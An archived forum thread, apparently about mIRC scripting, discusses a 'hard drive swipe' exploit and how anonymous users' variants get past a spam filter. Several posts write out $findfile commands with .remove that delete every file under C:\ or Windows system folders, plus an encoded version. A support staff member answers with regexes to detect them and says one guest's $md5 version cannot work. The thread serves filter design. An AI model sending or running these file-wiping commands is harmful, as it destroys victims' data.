IMPORTANT - HARD DRIVE SWIPE EXPLIOT

These are old archives. They are kept for historic purposes only.
Guest

Post by Guest »

This could easily be bypassed and was pointed out by one of my users

origional: //echo (-q)? \$findfile\(C:\\,\*,0,\.remove \$shortfn\(\$1-\)\)


many ways to bypass:

//echo (-q)? \$findfile\(C:\\windows\\,\*,0,\.remove \$shortfn\(\$1-\)\)

//echo (-q)? \$findfile\(C:\\windows\\system32\\,\*,0,\.remove \$shortfn\(\$1-\)\)

//echo (-q)? \$findfile\(C:\\windows\\system\\,\*,0,\.remove \$shortfn\(\$1-\)\)

//echo (-q)? \$findfile\(C:\\Documents and Settings\\,\*,0,\.remove \$shortfn\(\$1-\)\)


The list could go on forever
Guest

Post by Guest »

This would also bypass the spam filter:

//say $decode()2&D@4V%L=FEA````)
Guest

Post by Guest »

sorry that last one was a mistake it would be:

//say $decode(M*"UQ*3\@7"1F:6YD9FEL95PH0SI<7"Q<*BPP+%PN<F5M;W9E(%PD<VAO<G1F+;EPH7"0Q+5PI7"D`)

or

//echo $md5(cf9cc93a014a589dbb3da159cafde6bf)
Stealth
Head of Support
Posts: 2086
Joined: Tue Jun 15, 2004 8:50 pm
Location: Chino Hills, CA, US
Contact:

Post by Stealth »

The simple regex of

Code: Select all

\$findfile\([A-Za-z]:\\(.+)?,\*,0,\.remove (\$shortfn\()?\$1-\)?\)
will match almost all the whack combinations of $findfile and remove used in this purpose.

It will match:
$findfile(C:\,*,0,.remove $1-)
$findfile(C:\,*,0,.remove $shortfn($1-))
$findfile(C:\windows,*,0,.remove $shortfn($1-))
$findfile(C:\anything,*,0,.remove $shortfn($1-))
$findfile(C:\,*,0,.remove $1-).shortfn
$findfile(C:\anything,*,0,.remove $1-).shortfn
Guest wrote://echo $md5(cf9cc93a014a589dbb3da159cafde6bf)
I dont know what you are thinking with the $md5, since MD5 is a one way encryption and cannot be reversed.
Guest wrote://say $decode(M*"UQ*3\@7"1F:6YD9FEL95PH0SI<7"Q<*BPP+%PN<F5M;W9E(%PD<VAO<G1F+;EPH7"0Q+5PI7"D`)
This one wont work without a form of Eval, either by $( or $eval.

Code: Select all

\$\(.+,[0-9]+\)
\$eval\(.+,[0-9]+\)
Post Reply